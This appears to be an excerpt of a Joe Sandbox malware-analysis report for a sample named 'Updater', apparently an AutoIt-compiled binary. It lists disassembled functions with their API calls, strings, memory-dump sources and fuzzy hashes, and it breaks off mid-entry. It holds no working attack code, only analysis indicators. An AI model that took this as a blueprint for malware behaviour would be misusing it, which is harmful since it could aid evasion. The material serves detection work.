Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd

Similarity

API ID: Value$Close$_wcslen$ConnectCreateRegistry
String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
API String ID: 9721498-966354055
Opcode ID: 52afd73d506f453124bb7b5a05fef99f1960729a05d9176934a8f736d69a03fd
Instruction ID: 3acb172c22241db6312a49836c27e58501b716a4be1994875c3939020ee5c208
Opcode Fuzzy Hash: 52afd73d506f453124bb7b5a05fef99f1960729a05d9176934a8f736d69a03fd
Instruction Fuzzy Hash: 3A127A35604211EFCB24DF14C881A6AB7E6FF88714F04845DF94A9B3A2CB79ED45CB86

Function 007612EA Relevance: 30.1, APIs: 6, Strings: 11, Instructions: 324windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 00761398
_wcslen.LIBCMT ref: 007613CF
SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00761410
_wcslen.LIBCMT ref: 00761435
_wcslen.LIBCMT ref: 00761488
_wcslen.LIBCMT ref: 007614E2

Part of subcall function 006F014F: _wcslen.LIBCMT ref: 006F015A

Part of subcall function 00733A35: SendMessageW.USER32(?,0000110A,00000001,00000000), ref: 00733A67

Strings

UNCHECK, xrefs: 00761672
GETTEXT, xrefs: 007615D7
GETITEMCOUNT, xrefs: 00761568
GETSELECTED, xrefs: 00761596
CHECK, xrefs: 00761430, 00761443
EXISTS, xrefs: 007614DD, 007614EE
EXPAND, xrefs: 00761538
GETTOTALCOUNT, xrefs: 007613CA, 007613DD
ISCHECKED, xrefs: 00761619
COLLAPSE, xrefs: 00761483, 00761496
SELECT, xrefs: 00761647

Memory Dump Source

Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true

Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd

Similarity

API ID: _wcslen$MessageSend$BuffCharUpper
String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
API String ID: 1103490817-4258414348
Opcode ID: 4c52a0f7e77f770087d258a3245f5285d08d40419aecba9a5083a3fd64d6c57c
Instruction ID: 604ae357608127abf8466b3367b674eccd6c6ef35fa94614b4fc5b8b7bebeeb3
Opcode Fuzzy Hash: 4c52a0f7e77f770087d258a3245f5285d08d40419aecba9a5083a3fd64d6c57c
Instruction Fuzzy Hash: A5C1EF746043119FCB14EF24C444A6AB7E2AF95304F48846DFC579B3A2DB39EE46CB86

Function 006E05DB Relevance: 30.0, APIs: 2, Strings: 15, Instructions: 277COMMON

Download Yara Rule

Strings

#ce, xrefs: 006E0752
#pragma compile, xrefs: 006E0638
#requireadmin, xrefs: 006E0664
Unterminated group of comments, xrefs: 00726A95
#cs, xrefs: 006E06D8, 006E072A
#comments-end, xrefs: 006E073E
#comments-start, xrefs: 006E06C4, 006E0716
#include, xrefs: 006E06AC
Cannot parse #include, xrefs: 00726A82
", xrefs: 00726952
#include-once, xrefs: 006E0694
#notrayicon, xrefs: 006E064C
Bad directive syntax error, xrefs: 00726999
', xrefs: 00726968
#OnAutoItStartRegister, xrefs: 006E067C

Memory Dump Source

Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true

Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd

Similarity

API ID:
String ID: "$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$'$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
API String ID: 0-1645009161
Opcode ID: de01b41a4e54e2912d526643c6182db98812e1e84c83c6085722423955e7d7e0
Instruction ID: 16f70ecdd2241fdbae366ec4d0596be97a765dd60c4afa71f9a4ff0a139d0aff
Opcode Fuzzy Hash: de01b41a4e54e2912d526643c6182db98812e1e84c83c6085722423955e7d7e0
Instruction Fuzzy Hash: A4912A70641319FFEF10AF61DC42FAE37AAAF54340F048019F905AB192EBB8E955C7A5

Function 00768D07 Relevance: 29.9, APIs: 14, Strings: 3, Instructions: 199windowlibraryCOMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00768D25
_wcslen.LIBCMT ref: 00768D39
_wcslen.LIBCMT ref: 00768D5C
_wcslen.LIBCMT ref: 00768D7F
LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 00768DC1
LoadLibraryExW.KERNEL32(?,00000000,00000032,?,?,00000001,?,?,?,00763FB0,?), ref: 00768E23
LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00768E5C
LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 00768E9F
LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00768ED6
FreeLibrary.KERNEL32(?), ref: 00768EE2
ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00768EF2
DestroyIcon.USER32(?), ref: 00768F01
SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00768F1E
SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00768F2A

Strings

.exe, xrefs: 00768D53
.dll, xrefs: 00768D76
.icl, xrefs: 00768D33

Memory Dump Source

Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true

Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd

Similarity

API ID: Load$Image_wcslen$IconLibraryMessageSend$DestroyExtractFree
String ID: .dll$.exe$.icl
API String ID: 799131459-1154884017
Opcode ID: 88997ce8253116a4fe1acfb09a3e138c09e8a4faa5a1e6a3aca5b93acd88eddf
Instruction ID: b8e64f0f15def7f1777aa9aa72f74f12d786a12b0573ed0d732380986c9e35d0
Opcode Fuzzy Hash: 88997ce8253116a4fe1acfb09a3e138c09e8a4faa5a1e6a3aca5b93acd88eddf
Instruction Fuzzy Hash: 5661D171A00219FAEB64CF64CC45BBE77A8BB08711F108209FD16D61D0DFB99E90CBA5

Function 00744A8B Relevance: 28.2, APIs: 8, Strings: 8, Instructions: 177COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?), ref: 00744B0A
_wcslen.LIBCMT ref: 00744B15
_wcslen.LIBCMT ref: 00744B5C
_wcslen.LIBCMT ref: 00744B93
GetDriveTypeW.KERNEL32(?), ref: 00744BC7
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00744C10
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00744C4A
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00744C7F

Strings

closed, xrefs: 00744B41, 00744B8E, 00744BA3
wait, xrefs: 00744C32
open, xrefs: 00744B57, 00744B6A
open , xrefs: 00744BD6
close, xrefs: 00744B10, 00744B23
type cdaudio alias cd wait, xrefs: 00744BF2
close cd wait, xrefs: 00744C67
set cd door , xrefs: 00744C16

Memory Dump Source

Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true

Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd

Similarity

API ID: SendString_wcslen$BuffCharDriveLowerType
String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
API String ID: 1839972693-4113822522
Opcode ID: fa1c98dd106a0640809fb537bb4cb600994a5b1db4d4407effe8998de6468de2
Instruction ID: 8e2ec7acce2ee73028c42151b66d7506809cd8967373b7717b980aab6088bf62
Opcode Fuzzy Hash: fa1c98dd106a0640809fb537bb4cb600994a5b1db4d4407effe8998de6468de2
Instruction Fuzzy Hash: F461C372A043009FC714EF28D881B6AB3E1EF94714F14852DF856A7391EB75EE05CB86

Function 0075D3F0 Relevance: 28.2, APIs: 6, Strings: 10, Instructions: 165COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 0075D3F5
_wcslen.LIBCMT ref: 0075D456

Strings

HKEY_CURRENT_USER, xrefs: 0075D59A
HKU, xrefs: 0075D5CD
HKLM, xrefs: 0075D48E, 0075D49F
HKCU, xrefs: 0075D5AB
HKCR, xrefs: 0075D500, 0075D511
HKCC, xrefs: 0075D589
HKEY_CURRENT_CONFIG, xrefs: 0075D53A, 0075D54B
HKEY_CLASSES_ROOT, xrefs: 0075D4CB, 0075D4DC
HKEY_USERS, xrefs: 0075D5BC
HKEY_LOCAL_MACHINE, xrefs: 0075D451, 0075D462

Memory Dump Source

Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true

Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd

Similarity

API ID: _wcslen
String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
API String ID: 176396367-909552448
Opcode ID: 35c6b35227ee30a555fcbc3946e081422d2745c0cd5e4c238ed07b679b0cf83b
Instruction ID: 5ecd885cb0da3843d58683034d0f660ffa12381b9108ea44cd1b9a5634c86b84
Opcode Fuzzy Hash: 35c6b35227ee30a555fcbc3946e081422d2745c0cd5e4c238ed07b679b0cf83b
Instruction Fuzzy Hash: AE510332E0019687CF70AF68E9011FB3311AB22749F50412DFC165B659FAB9EC6EC782

Function 007369F9 Relevance: 27.2, APIs: 18, Instructions: 195windowCOMMON

Download Yara Rule

APIs

LoadIconW.USER32(00000063), ref: 00736A0C
SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00736A1D
SetWindowTextW.USER32(?,?), ref: 00736A35
GetDlgItem.USER32(?,000003EA), ref: 00736A4B
SetWindowTextW.USER32(00000000,?), ref: 00736A51
GetDlgItem.USER32(?,000003E9), ref: 00736A61
SetWindowTextW.USER32(00000000,?), ref: 00736A67
SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 00736A88
SendDlgItemMessageW.USER32(?,000003E9,000000C5,?,00000000), ref: 00736AA1
GetWindowRect.USER32(?,?), ref: 00736AAA
_wcslen.LIBCMT ref: 00736B0A
GetDesktopWindow.USER32 ref: 00736B48
GetWindowRect.USER32(00000000), ref: 00736B4F

Memory Dump Source

Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true

Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd

Similarity

API ID: Window$Item$MessageSendText$Rect$DesktopIconLoad_wcslen
String ID:
API String ID: 2606896325-0
Opcode ID: e0d286aff5647efdf6c6d4a2042c7764b6e8b69f6929a613733f902239a021ca
Instruction ID: 7edea8c12d593b84da356ef469d9ecc80cb8e13e5592bca2c7454530eea05d6c
Opcode Fuzzy Hash: e0d286aff5647efdf6c6d4a2042c7764b6e8b69f6929a613733f902239a021ca
Instruction Fuzzy Hash: 19716E71A00709AFEB20DFA8CD45BAEBBF5FF44704F108518E546A61A1D779ED44CB14

Function 007509D7 Relevance: 27.1, APIs: 18, Instructions: 129COMMON

Download Yara Rule

APIs

LoadCursorW.USER32(00000000,00007F89), ref: 007509F0
LoadCursorW.USER32(00000000,00007F8A), ref: 007509FB
LoadCursorW.USER32(00000000,00007F00), ref: 00750A06
LoadCursorW.USER32(00000000,00007F03), ref: 00750A11
LoadCursorW.USER32(00000000,00007F8B), ref: 00750A1C
LoadCursorW.USER32(00000000,00007F01), ref: 00750A27
LoadCursorW.USER32(00000000,00007F81), ref: 00750A32
LoadCursorW.USER32(00000000,00007F88), ref: 00750A3D
LoadCursorW.USER32(00000000,00007F80), ref: 00750A48
LoadCursorW.USER32(00000000,00007F86), ref: 00750A53
LoadCursorW.USER32(00000000,00007F83), ref: 00750A5E
LoadCursorW.USER32(00000000,00007F85), ref: 00750A69
LoadCursorW.USER32(00000000,00007F82), ref: 00750A74
LoadCursorW.USER32(00000000,00007F84), ref: 00750A7F
LoadCursorW.USER32(00000000,00007F04), ref: 00750A8A
LoadCursorW.USER32(00000000,00007F02), ref: 00750A95
GetCursorInfo.USER32(?), ref: 00750AA5
GetLastError.KERNEL32 ref: 00750AE7

Memory Dump Source

Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true

Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd

Similarity

API ID: Cursor$Load$ErrorInfoLast
String ID:
API String ID: 3215588206-0
Opcode ID: 09e39eecf1dd300004ca20ec2be9a24e1111d4385fa70d5df8462b8941d04796
Instruction ID: 90bce3c755956414ee8535da84677670712f73c8e479f196dd9984f353a75d70
Opcode Fuzzy Hash: 09e39eecf1dd300004ca20ec2be9a24e1111d4385fa70d5df8462b8941d04796
Instruction Fuzzy Hash: 084144B0E043196ADB10DFBA8CC9C5EBFE8FF04754B50852AE51DE7291DA789901CF91

Function 007450A6 Relevance: 24.8, APIs: 7, Strings: 7, Instructions: 259COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?), ref: 0074510A
_wcslen.LIBCMT ref: 00745119
_wcslen.LIBCMT ref: 0074515A
_wcslen.LIBCMT ref: 0074519A
_wcslen.LIBCMT ref: 007451DA
_wcslen.LIBCMT ref: 00745217
GetDriveTypeW.KERNEL32(?,00797A20), ref: 007452A8

Strings

all, xrefs: 00745114, 00745125
ramdisk, xrefs: 0074524E
removable, xrefs: 00745195, 007451A6
network, xrefs: 00745212, 00745223
fixed, xrefs: 007451D5, 007451E6
cdrom, xrefs: 00745155, 00745166
unknown, xrefs: 00745267

Memory Dump Source

Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true

Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd

Similarity

API ID: _wcslen$BuffCharDriveLowerType
String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
API String ID: 2055661098-1000479233
Opcode ID: a5eda8781fc036583fc7f9f318e42635a05fc529d4941d018640608bf0487ced
Instruction ID: c94f782feedce524a9b0d78252b9c0e12b72efce976f6dcc8aa47c7063c3e8d8
Opcode Fuzzy Hash: a5eda8781fc036583fc7f9f318e42635a05fc529d4941d018640608bf0487ced
Instruction Fuzzy Hash: D2910572A082108FC714DF28C841B6AB7A1FF50708F14446EFC5A5B352EB75ED4ACB96

Function 006F071E Relevance: 24.6, APIs: 9, Strings: 5, Instructions: 78libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll), ref: 006F073A
GetModuleHandleW.KERNEL32(kernel32.dll), ref: 006F074B
GetProcAddress.KERNEL32(00000000,InitializeConditionVariable), ref: 006F0761
GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 006F076F
GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 006F077D
CreateEventW.KERNEL32(00000000,00000001,00000000,00000000), ref: 006F07D3
___scrt_fastfail.LIBCMT ref: 006F07E8
DeleteCriticalSection.KERNEL32(007A16CC,00000007), ref: 006F07F3
CloseHandle.KERNEL32(00000000), ref: 006F0803

Strings

SleepConditionVariableCS, xrefs: 006F0767
kernel32.dll, xrefs: 006F0746
api-ms-win-core-synch-l1-2-0.dll, xrefs: 006F0735
WakeAllConditionVariable, xrefs: 006F0775
InitializeConditionVariable, xrefs: 006F075B

Memory Dump Source

Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true

Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd

Similarity

API ID: AddressHandleProc$Module$CloseCreateCriticalDeleteEventSection___scrt_fastfail
String ID: InitializeConditionVariable$SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
API String ID: 2238755874-1714406822
Opcode ID: 832b3ae433c5c937c70c1cb5714570e1a52215c9b245336495257314310927f4
Instruction ID: e569883321eb1b2a8e63a4ccf82afbb42bf04854ef463fd66c854a31b48dd7b0
Opcode Fuzzy Hash: 832b3ae433c5c937c70c1cb5714570e1a52215c9b245336495257314310927f4
Instruction Fuzzy Hash: 732130B6F41315DBFB306BB55C09B7A26595B81B80F4AC124FD05D7391DEF89C008A94

Function 014B4F91 Relevance: 24.5, APIs: 7, Strings: 7, Instructions: 32libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(ole32.dll), ref: 014B4F97
GetProcAddress.KERNEL32(00000000,CoCreateInstanceEx), ref: 014B4FA8
GetProcAddress.KERNEL32(00000000,CoInitializeEx), ref: 014B4FB8
GetProcAddress.KERNEL32(00000000,CoAddRefServerProcess), ref: 014B4FC8
GetProcAddress.KERNEL32(00000000,CoReleaseServerProcess), ref: 014B4FD8
GetProcAddress.KERNEL32(00000000,CoResumeClassObjects), ref: 014B4FE8
GetProcAddress.KERNEL32(00000000,CoSuspendClassObjects), ref: 014B4FF8

Strings

CoReleaseServerProcess, xrefs: 014B4FD2
CoCreateInstanceEx, xrefs: 014B4FA2
CoResumeClassObjects, xrefs: 014B4FE2
ole32.dll, xrefs: 014B4F92
CoSuspendClassObjects, xrefs: 014B4FF2
CoAddRefServerProcess, xrefs: 014B4FC2
CoInitializeEx, xrefs: 014B4FB2

Memory Dump Source

Source File: 00000023.00000002.2238771515.000000000149A000.00000040.00000020.00020000.00000000.sdmp, Offset: 0149A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_149a000_Updater.jbxd

Similarity

API ID: AddressProc$HandleModule
String ID: CoAddRefServerProcess$CoCreateInstanceEx$CoInitializeEx$CoReleaseServerProcess$CoResumeClassObjects$CoSuspendClassObjects$ole32.dll
API String ID: 667068680-2233174745
Opcode ID: be7369dcf5cdda972958a61dcfe44cdcce84782b37be27af76527758de608049
Instruction ID: 7b1fa1c8c8962805f9a728d5189cc817989dcb4e84799cc25a5e7627d0855c13
Opcode Fuzzy Hash: be7369dcf5cdda972958a61dcfe44cdcce84782b37be27af76527758de608049
Instruction Fuzzy Hash: A2F0ACEC6453026BA620BF725DC5C666A9CD638A04B72181F74015E135FBF486107774

Function 00754BE7 Relevance: 23.2, APIs: 11, Strings: 2, Instructions: 479libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll), ref: 00754CB9
GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 00754CCB
GetModuleFileNameW.KERNEL32(?,?,00000104,?,?), ref: 00754CF0
FreeLibrary.KERNEL32(00000000), ref: 00754D3C
StringFromGUID2.OLE32(?,?,00000028), ref: 00754DA6
SysFreeString.OLEAUT32(00000009), ref: 00754E60
QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 00754EC6
SysFreeString.OLEAUT32(?), ref: 00754EF0

Strings

kernel32.dll, xrefs: 00754CB4
GetModuleHandleExW, xrefs: 00754CC5

Memory Dump Source

Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true

Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd

Similarity

API ID: FreeString$Library$AddressFileFromLoadModuleNamePathProcQueryType
String ID: GetModuleHandleExW$kernel32.dll
API String ID: 354098117-199464113
Opcode ID: 870ee705abad6946ccd3a36047f71164df7289874838c2090506adf045f6dfec
Instruction ID: c7e4d36e0d9ef10aa0e06b118c8dca4c3d90fa06f451a16e118acd41c7cdf6a1
Opcode Fuzzy Hash: 870ee705abad6946ccd3a36047f71164df7289874838c2090506adf045f6dfec
Instruction Fuzzy Hash: 1B125071A00209EFDB14CF54C894EAEB7B5FF45319F248098E90A9B251D775EE86CBA0

Function 006E36C0 Relevance: 23.0, APIs: 12, Strings: 1, Instructions: 215windowCOMMON

Download Yara Rule

APIs

GetMenuItemCount.USER32 ref: 00727E4B
GetMenuItemCount.USER32 ref: 00727EFB
GetCursorPos.USER32(?), ref: 00727F3F
SetForegroundWindow.USER32(00000000), ref: 00727F48
TrackPopupMenuEx.USER32(?,00000000,?,00000000,00000000,00000000,?,?,00000003,00000000,?,00000006,00000000,?,00000004,00000000), ref: 00727F5B
PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00727F67

Strings

0, xrefs: 006E36CE

Memory Dump Source

Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true

Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd

Similarity

API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow
String ID: 0
API String ID: 36266755-4108050209
Opcode ID: 7fcc906f1cd2b65863b242a9672d1ad9a679e56bc0aac8b21e381da4019a8c10
Instruction ID: da48b9f056581cd4ceb4d10ca78b35bdb3473e100486db99a064c22cce0cf5c2
Opcode Fuzzy Hash: 7fcc906f1cd2b65863b242a9672d1ad9a679e56bc0aac8b21e381da4019a8c10
Instruction Fuzzy Hash: 507156B0A48325BFEB258F25DD49FAABF65FF05324F104206F515A62D1C7B96C10CBA4

Function 006E4854 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 171timeCOMMON

Download Yara Rule

APIs

Part of subcall function 006E438C: InvalidateRect.USER32(?,00000000,00000001,?,?,?,006E5687,01433E38,?,?,?), ref: 006E43EF

DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 006E490C
KillTimer.USER32(00000000,?,?,?,?,006E3F4E,00000000,?,?,006E4387,?,?), ref: 006E49AB
DestroyAcceleratorTable.USER32(00000000), ref: 007288E4
ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,006E3F4E,00000000,?,?,006E4387,?,?), ref: 00728917
ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,006E3F4E,00000000,?,?,006E4387,?,?), ref: 0072892E
ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,006E3F4E,00000000,?,?,006E4387,?,?), ref: 0072894A
DeleteObject.GDI32(00000000), ref: 0072895C

Strings

(z, xrefs: 006E49D0

Memory Dump Source

Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true

Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd

Similarity

API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
String ID: (z
API String ID: 641708696-163357204
Opcode ID: b68209d85de2c5f506774f59bbc4462423314e08d82f467b3d0cb2b218d8e208
Instruction ID: 1a9c0b30782b9bc9b397a815e63c2c7c559acd8271d717c6111f02f7166831db
Opcode Fuzzy Hash: b68209d85de2c5f506774f59bbc4462423314e08d82f467b3d0cb2b218d8e208
Instruction Fuzzy Hash: 4661AE31502751DFCB259F2AE948B2677F2FB81316F108119E08257A61CB7DBC92DF8A

Function 0074CF5D Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 144networkCOMMON

Download Yara Rule

APIs

